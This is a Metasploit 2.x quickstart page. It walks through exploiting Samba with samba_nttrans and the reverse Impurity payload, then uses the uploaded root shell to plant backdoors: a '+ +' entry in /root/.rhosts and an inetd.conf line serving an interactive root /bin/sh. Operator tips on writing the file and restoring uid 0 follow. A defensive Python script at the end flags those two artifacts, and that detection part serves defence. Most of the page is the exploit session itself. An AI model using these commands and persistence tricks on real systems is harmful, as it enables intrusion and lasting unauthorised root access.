QUICKSTART.impurity  (metasploit/docs, mini Pentoo LiveCD 2006.1)
Text File  |  2006-06-30  |  5KB  |  121 lines

1) Determine your metasploit interface and options

+ -- --=[ msfconsole v2.3 [46 exploits - 68 payloads]

msf > setg RHOST 192.168.0.252
RHOST -> 192.168.0.252
msf > setg LHOST 192.168.0.20
LHOST -> 192.168.0.20
msf > use samba_nttrans
msf samba_nttrans > set TARGET 3
TARGET -> 3


2) Set PAYLOAD to linux_ia32_reverse_impurity

msf samba_nttrans > set PAYLOAD linux_ia32_reverse_impurity
PAYLOAD -> linux_ia32_reverse_impurity


3) Set PEXEC to the path of your impurity executable (the program that is uploaded into the exploited process over the payload connection and run there; here the bundled shelldemo)

msf samba_nttrans(linux_ia32_reverse_impurity) > set PEXEC data/shelldemo
PEXEC -> data/shelldemo


4) Launch the exploit

msf samba_nttrans(linux_ia32_reverse_impurity) > exploit
[*] Starting Reverse Handler.
[*] Starting attack against target Samba 2.0.6 / Red Hat 6.2
[*] Attack will use 1 threads with 1 total attempts

[*] Establishing 1 connection(s) to the target...
[*] --- Setting up the SMB session...
[*] --- Establishing tree connection...
[*] --- Sending first nttrans component...
[*] --- Completed range 0x081389c0:0x08138380
[*] Got connection from 192.168.0.20:4321 <-> 192.168.0.252:1042
[*] Sleeping before sending impurity data.
[*] Uploading impurity data (31628), Please wait...
[*] Executing impurity data.

--=[ Impurity Demo Shell ]=--
impurity demo > 


5) Use the Impurity shell!

impurity demo > help
Available commands:
    help                            Show this help screen
    fork                            Fork off another shelldemo process
    exec <cmd>                      Execute <cmd>
    system <cmd>                    Fork and execute <cmd> on std(in/out/err)
    quit                            Exit the shell

    open <path>                     Open a file and return the file descriptor
    lseek <fd> <offset> <whence>    Reposition <fd>
    read <fd> [bytes]               Read <bytes> from file descriptor
    write <fd> [bytes]              Write [bytes] (or until "EOF") to <fd>
    close <fd>                      Close specified file descriptor
    dup <old_fd>                    Duplicate <old_fd> and return new reference
    dup2 <old_fd> <new_fd>          Duplicate <old_fd> to <new_fd>

    ls [path]                       Print information/contents about [path] (default: .)
    getcwd                          Get current working directory
    chmod <permission> <path>       Change <path> permissions to <permission>
    chown <user> <path>             Change <path> owner to <user>
    chgrp <group> <path>            Change <path> group to <group>
    chdir <path>                    Change working directory to <path>
    mkdir <path> [permission]       Create <path> directory with [permission] (default: 755)
    rmdir <path>                    Remove <path> directory
    rename <old_file> <new_file>    Rename <old_file> to <new_file>
    unlink <path>                   Remove <path> file
    chroot <path>                   Change root directory to <path>
    link <file> <reference>         Hard link <reference> to <file>
    symlink <file> <reference>      Symbolically link <reference> to <file>

    getid                           Print information about [e][ug]id
    setuid <uid>                    Set UID to <uid>
    setgid <gid>                    Set GID to <gid>

    kill <pid> [signal]             Send <pid> [signal] (default: 9)
    getpid                          Print current process ID
    getppid                         Print parent process ID

    time                            Display the current system time
    uname                           Get kernel information
    hostname [name]                 Print (or set) the hostname
    reboot                          Reboot the computer
    shutdown                        Shutdown the computer
    halt                            Halt the computer

    lsfd                            Show information about open file descriptors

Warning! Before using any of the following you are recommended to fork for your own safety!
    fchdir_breakchroot <temp_dir>   Use <temp_dir> to attempt to break out of chroot
impurity demo > getid
uid=0(root) gid=0(root) euid=99(nobody) egid=99(nobody)
impurity demo > setuid 0
impurity demo > setgid 0
impurity demo > chdir /root/
impurity demo > open .rhosts
open: 10
impurity demo > write 10
+ +
EOF
impurity demo > close 10
impurity demo > chdir /etc
impurity demo > open inetd.conf
open: 10
impurity demo > write 10
nntp stream tcp nowait root /bin/sh sh -i
EOF
impurity demo > close 10
impurity demo > system ps aux | grep inetd
root       485  0.0  0.2  1168  464 ?        S    Mar22   0:00 inetd
root     10276  0.0  0.2  1208  424 ?        S    11:11   0:00 grep inetd
impurity demo > kill 485 1
impurity demo > exit
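The session above ends by leaving two persistence hooks on the target: a `+ +` wildcard in /root/.rhosts (any user from any host may rlogin as root without a password) and an inetd.conf entry that serves an interactive root /bin/sh on the nntp port, picked up when inetd is sent signal 1 (SIGHUP) and rereads its configuration. Two caveats for the operator: the help listing documents no flags for `open`, so whether `write` appends to inetd.conf or overwrites its first bytes depends on how shelldemo opens the file (an `lseek <fd> 0 2`, whence 2 being SEEK_END, before writing would position at end-of-file if numeric whence values are accepted; that is an assumption, not something the page states), and `setuid 0` only works here because Samba dropped privileges with seteuid, leaving the real uid 0, as the `getid` output shows.

From the defender's side, the following Python script is an added example and is not part of the Metasploit documentation or the Impurity shelldemo. It parses .rhosts and inetd.conf text and flags exactly these two artifacts; the sample file contents and the SHELLS set are constructed for the example, with only the two lines typed in the transcript taken from the page.

```python
"""Checks for the two persistence tricks left behind by the shelldemo
session: a '+ +' wildcard in /root/.rhosts and an inetd.conf service that
spawns a root shell.  All sample file contents are constructed for this
example; only the two lines typed in the transcript are taken from it."""

import os

# Constructed sample: the contents the demo writes to /root/.rhosts.
SAMPLE_RHOSTS = "+ +\n"

# Constructed sample inetd.conf: ordinary entries plus the backdoor line
# from the transcript.  Field order is the classic inetd one.
SAMPLE_INETD_CONF = """\
# <service> <socktype> <proto> <flags> <user> <server_path> <args>
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
finger  stream  tcp     nowait  nobody  /usr/sbin/tcpd  in.fingerd
nntp stream tcp nowait root /bin/sh sh -i
"""

# Programs that, if inetd execs them directly, hand the client a shell.
# The set is an assumption for the example; extend it for your systems.
SHELLS = {"sh", "bash", "ash", "dash", "csh", "tcsh", "ksh", "zsh"}


def rhosts_wildcards(text):
    """Return (lineno, line) for .rhosts entries trusting any host or any
    user.  Each line is 'host [user]'; a bare '+' in either field is a
    wildcard, so '+ +' lets any user on any host in without a password."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        host = fields[0]
        user = fields[1] if len(fields) > 1 else ""
        if host == "+" or user == "+":
            hits.append((lineno, line.strip()))
    return hits


def parse_inetd_conf(text):
    """Parse inetd.conf into dicts.  The first six fields are whitespace
    separated; everything after the server path is the argument string."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        f = line.split(None, 6)
        if len(f) < 6:          # malformed line: inetd would reject it too
            continue
        entries.append({
            "lineno": lineno, "service": f[0], "socktype": f[1],
            "proto": f[2], "flags": f[3], "user": f[4],
            "server": f[5], "args": f[6] if len(f) > 6 else "",
        })
    return entries


def shell_services(entries):
    """Flag entries whose effective server program is a shell.  Looks
    through a tcpd wrapper, since the real program is then args[0]."""
    flagged = []
    for e in entries:
        prog = os.path.basename(e["server"])
        argv = e["args"].split()
        if prog == "tcpd" and argv:
            prog = os.path.basename(argv[0])
        if prog in SHELLS:
            flagged.append(dict(e, program=prog,
                                interactive="-i" in argv,
                                as_root=e["user"] == "root"))
    return flagged


def audit(rhosts_text, inetd_text):
    """Run both checks and return a list of human-readable findings."""
    findings = []
    for lineno, line in rhosts_wildcards(rhosts_text):
        findings.append(f".rhosts:{lineno}: wildcard trust entry '{line}'")
    for e in shell_services(parse_inetd_conf(inetd_text)):
        findings.append(
            f"inetd.conf:{e['lineno']}: service {e['service']} on {e['proto']} "
            f"runs {e['program']} as {e['user']}"
            + (" (interactive)" if e["interactive"] else ""))
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_RHOSTS, SAMPLE_INETD_CONF):
        print(finding)
```

On a real host, feed `audit()` the contents of /root/.rhosts (and other home directories' .rhosts) and /etc/inetd.conf; the tcpd handling matters because Red Hat 6.2-era inetd.conf wraps most services with /usr/sbin/tcpd, so the program to judge is the first argument, not the server path.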